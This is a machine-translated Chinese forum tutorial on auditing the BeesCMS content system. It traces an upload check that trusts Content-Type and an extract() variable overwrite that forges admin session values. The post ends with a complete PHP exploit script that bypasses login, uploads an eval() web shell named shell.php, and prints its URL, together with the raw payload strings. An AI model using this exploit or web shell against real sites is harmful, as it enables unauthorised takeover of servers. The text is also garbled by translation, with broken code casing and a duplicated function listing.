That's what code audits do. 3 Beescms Getshell

The author of the spring and autumn--the Somalia of the Sea Thief

Objective
The last time (http://bbs.ichunqiu.com/thread-13714-1-1.html) spoke of several key concerns in rapid vulnerability mining, command execution, file manipulation, and SQL injection. and take SQL as an example of a simple code audit, today, a change of ideas, from the file Operation section, after all, the file operation of a bad is getshell, compared to inject steps slowly can be more readily.

First, focus on
For the File Operations section, first of all the functions and characteristics of the PHP built-in file operation function should have a rough understanding

File_get_contents ()
File_put_contents ()
Move_uploaded_file ()
ReadFile ()
fopen ()
File ()
Fputs ()
Fwrite ()
............

These are commonly used in the file reading and writing functions, general file Class vulnerability directly search for these functions of the call, tracking the context parameter passing process can be. It's easy to say. Actually, it takes a long time to see a call, especially in the rapid exploit, the structure of the system is not familiar, some parameters can be passed or the method may seem to be confused at one glance. So how to quickly discover a file class of vulnerabilities.
Audit file class Vulnerability, first I will go to see the upload part of the system. The upload section is a set of processes that have been constructed from input to write to output, and if there is a problem, then it is possible to get the shell directly.
Upload vulnerability has been dug for so many years, various types of CMS will be more or less in the upload section to do some checks and restrictions, common checks have
1, $_files[' file ' [' name '] will typically take the extension from the file name of the upload, and compare it with the whitelist or blacklist to determine whether to continue uploading.
2, $_files[' file ' [' type '] upload the file type, is generally compared with the white list.
3, $_files[' file ' [' tmp_name '] upload files temporary save files, some more rigorous CMS will be in this phase with getimagesize and other functions to check the temporary files. If the file is not lawfully discarded directly
The common limitations are
1, using is_uploaded_file () This function will check whether $_files[' file ' [' Tmp_name '] is a legitimate upload file, when the $_files is covered by the vulnerability, can be modified $_files[' file ' [' Tmp_ Name '] would be a great security threat if the function that handles file uploads is copy then the lightest is an arbitrary file read vulnerability.
2, use Move_uploaded_file () function alone to process the upload file, for the same reason, Move_uploaded_file function will also determine whether it is a legitimate file. Reduces the probability of lying on a gun when there are variable coverage vulnerabilities in the system.
3. The file name is not controllable and the suffix is restricted to members of an array such as

$ext =array (' jpg ', ' png ', ' gif ');

$filename = ' user_avatar_01′. $ext [$s];

And then we'll look at our target beescms.
Second, actual combat
Let's take a look at Beescms's upload section code.

if (Isset ($_files[' up ')) {

if (Is_uploaded_file ($_files[' up ' [' tmp_name '])) {

if ($up _type== ' pic ') {

$is _thumb=empty ($_post[' thumb ")? 0:$_post[' thumb '];

$thumb _width=empty ($_post[' thumb_width ')? $_sys[' Thump_width ']:intval ($_post[' thumb_width ']);

$thumb _height=empty ($_post[' thumb_height ')? $_sys[' Thump_height ']:intval ($_post[' thumb_height ']);

$logo = 0;

$is _up_size = $_sys[' upload_size ']*1000*1000;

$value _arr=up_img ($_files[' up '), $is _up_size,array (' image/gif ', ' image/jpeg ', ' image/png ', ' image/jpg ', ' image/bmp ') , ' Image/pjpeg '), $is _thumb, $thumb _width, $thumb _height, $logo);

$pic = $value _arr[' pic ');

if (!empty ($value _arr[' thumb ')) {

$pic = $value _arr[' thumb '];

}

$str = "<script type=\" text/javascript\ ">$ (self.parent.document). Find (' #{$get} '). val (' {$pic} '); Self.parent.tb_remove ();</script> ";

Echo $str;

Exit

}//image Upload

}else{

Die (' No upload file or file size exceeds server limit size <a href= "javascript:history.back (1);" > Return to re-upload </a> ');

}

}

Can see with is_uploaded_file check the upload file is legitimate, so even if the system has variable coverage Vulnerability (this system does have, it will be said later), can not help much.

Actually, it's a up_img function.

function up_img ($file, $size, $type, $thumb =0, $thumb _width= ", $thumb _height=", $logo =1, $pic _alt= ") {

if (file_exists (data_path. ' sys_info.php ')) {include (data_path. ' sys_info.php ');}

if (Is_uploaded_file ($file [' tmp_name '])) {

if ($file [' Size ']> $size) {

MSG (' Picture over '. $size. ' Size ');

}

$pic _name=pathinfo ($file [' name ']);//Picture information

$file _type= $file [' type '];

if (!in_array (Strtolower ($file _type), $type)) {

MSG (' Upload image format is incorrect ');

}

$path _name= "upload/img/";

$path =cms_path. $path _name;

if (!file_exists ($path)) {

@mkdir ($path);

}

$up _file_name=empty ($pic _alt)? Date (' Ymdhis '). Rand (1,10000): $pic _alt;

$up _file_name2=iconv (' utf-8′, ' GBK ', $up _file_name);

$file _name= $path. $up _file_name2. $pic _name[' extension '];

if (file_exists ($file _name)) {

MSG (' The picture already exists, please change the picture Name! ');//Judge whether the name is the same

}

$return _name[' up_pic_size ']= $file [' Size '];//upload image size

$return _name[' up_pic_ext ']= $pic _name[' extension '];//upload file extension

$return _name[' up_pic_name ']= $up _file_name;//upload image name

$return _name[' Up_pic_path ']= $path _name;//upload picture path

$return _name[' Up_pic_time ']=time ();//Upload time

unset ($pic _name);

Start uploading

if (!move_uploaded_file ($file [' Tmp_name '], $file _name)) {

msg (' picture upload failed ', ', 0 ');

}

All right, let's see his checks and restrictions.

$file _type= $file [' type '];

if (!in_array (Strtolower ($file _type), $type)) {

MSG (' Upload image format is incorrect ');

}

This checks the type of the uploaded file if the type is not in the whitelist and prompts for an error.

This check actually does the useless work, type from the client, wants how to forge all can

Take a look at the saved file name

$pic _name=pathinfo ($file [' name ']);//Picture information

............

$up _file_name=empty ($pic _alt)? Date (' Ymdhis '). Rand (1,10000): $pic _alt;

$up _file_name2=iconv (' utf-8′, ' GBK ', $up _file_name);

$file _name= $path. $up _file_name2. $pic _name[' extension '];

Did not do any inspection directly take the $file[' name '] (that is, the name of the file when we uploaded) to the new generated file, as long as the forgery of the legal type can be properly Getshell

Third, twists
Is it over yet? And no, in fact, beecms this system front desk there is no upload point ... All upload functions require background privileges. A backstage Getshell of course can't meet, so continue digging. Let's take a look at how to verify background permissions.

admin/upload.php Second Line

Include (' init.php ');

admin/init.php Line 54th

if (!is_login ()) {header (' location:login.php '); exit;}

Take a look at this is_login function

includes/fun.php Line No. 997
function Is_login () {
if ($_session[' login_in ']==1&&$_session[' admin ') {
if (Time ()-$_session[' login_time ']>3600) {
Login_out ();
}else{
$_session[' Login_time ']=time ();
@session_regenerate_id ();
}
return 1;
}else{
$_session[' admin ']= ';
$_session[' Admin_purview ']= ';
$_session[' admin_id ']= ';
$_session[' admin_time ']= ';
$_session[' login_in ']= ';
$_session[' login_time ']= ';
$_session[' admin_ip ']= ';
return 0;
}

}

Take a look at this is_login function

includes/fun.php Line No. 997

function Is_login () {
if ($_session[' login_in ']==1&&$_session[' admin ') {
if (Time ()-$_session[' login_time ']>3600) {
Login_out ();
}else{
$_session[' Login_time ']=time ();
@session_regenerate_id ();
}
return 1;
}else{
$_session[' admin ']= ';
$_session[' Admin_purview ']= ';
$_session[' admin_id ']= ';
$_session[' admin_time ']= ';
$_session[' login_in ']= ';
$_session[' login_time ']= ';
$_session[' admin_ip ']= ';
return 0;
}

}

Here does not check the user information, but simply to determine whether there is a login_in admin two session identity bit and whether it is timed out only

As mentioned earlier, there are variable overwrite vulnerabilities in this system if you can overwrite (add) These $_session values to bypass this check.

$_session overrides have a prerequisite, session_start () must appear before overwriting, or even if the $_session variable is overwritten, once the session_start () variable is initialized.

Let's see where it covers.

includes/init.php   partial code omitted

 session_start (); 
 @include (Inc_path. ' Fun.php '); 
 define (' Is_mb ', IS_MB ()); 
   
 unset ($HTTP _env_vars, $HTTP _post_vars, $HTTP _get_vars, $HTTP _post_files, $HTTP _cookie_vars); 
 if (!GET_MAGIC_QUOTES_GPC ()) 
 {
     if (isset ($_request)) 
     { 
         $_REQUEST  = ADDSL ($_request); 
     } 
     $_COOKIE   = ADDSL ($_cookie); 
         $_post = ADDSL ($_post); 
         $_get = ADDSL ($_get); 
} 
 if (Isset ($_request)) {$_request  = Fl_value ($_request);} 
     $_COOKIE   = Fl_value ($_cookie); 
         $_get = Fl_value ($_get); 
 @extract ($_post); 
 @extract ($_get); 
 @extract ($_cookie); 

A globally filtered code, finally using extract to initialize the variable because the Extr_skip parameter is not used to cause arbitrary variable coverage, and because of the time of execution has been session_start ()
So you can overwrite (add) any $_session value. So that we can bypass the background check and turn a backstage getshell into the foreground Getshell.

Iv. utilization of

It's easy to use, first post index.php

_session[login_in]=1&_session[admin]=1&_session[login_time]=99999999999

Then open/admin/upload.php Select a php file to upload
To modify the Content-type in the upload package: for image/png.

Forget it or put exp on it ...
Use scripting to be aggressive, test in your local environment!
Do not use this script for any Internet site!
All the consequences of using this script have nothing to do with me!

<?php
Print_r ('
****************************************************
*
* Beescms File Upload Vulnerability
* by Smldhz
* qq:3298302054
* usage:php '. basename (__file__). ' URL
* php '. basename (__file__). ' [Url]http://www.beescms.com/beescms/[/url]
*
****************************************************
‘);
if ($ARGC!=2) {
Exit
}
$uri = $argv [1];
$payload 1 = ' _session[login_in]=1&_session[admin]=1&_session[login_time]=99999999999 ';
$payload 2 = Array (
' Up '; Filename= "shell.php" "." \r\ncontent-type:image/png\r\n\r\n<?php eval (\$_post[' x ');? > ' = '
);
Preg_match (' #Set-cookie: (. *); # ', Mycurl ($uri. " /index.php ", $payload 1), $match);
if (!isset ($match [1])) {
Die (' [-]opps! Cannot get Cookie ... ');
}
echo "[+]got Cookie:". $match [1]. " \ r \ n ";
echo "[+]now trying to getshell...\r\n";
$tmp = Mycurl ($uri. " /admin/upload.php ", $payload 2, $match [1]);
Preg_match (' #val \ (\ ' (. *) \ ' \) # ', $tmp, $shell);
if (!isset ($shell [1])) {
Die (' [-]opps! Cannot get shell ... see below\r\n '. $tmp);
}
echo "[+]your Shell:". $uri. " /upload/". $shell [1]." [PASSWORD]:X];

function Mycurl ($url, $postData = ', $cookie = ') {
$ch = Curl_init ();
curl_setopt ($ch, Curlopt_url, $url);
curl_setopt ($ch, Curlopt_post, true);
curl_setopt ($ch, Curlopt_header, 1);
curl_setopt ($ch, Curlopt_postfields, $postData);
curl_setopt ($ch, Curlopt_returntransfer, true);
if ($cookie! = ") {
curl_setopt ($ch, Curlopt_cookie, $cookie);
}
$ret = curl_exec ($ch);
Curl_close ($ch);
return $ret;
}

Summarize
Write the article is very tired, in fact, the whole article for a familiar with the PHP code audit person, two sentences can be said clearly

Foreground variable override $_session to bypass background validation

The background upload section only verifies that Content-type caused Getshell

Why write so much, not to earn more money (if you pay by the word ...) I hope that no matter the small partners understand the code audit, can see this article, do not say after reading can learn how much, at least step by step read down not so boring, novice look down can also feel the harvest.

That's what code audits do. 3 Beescms Getshell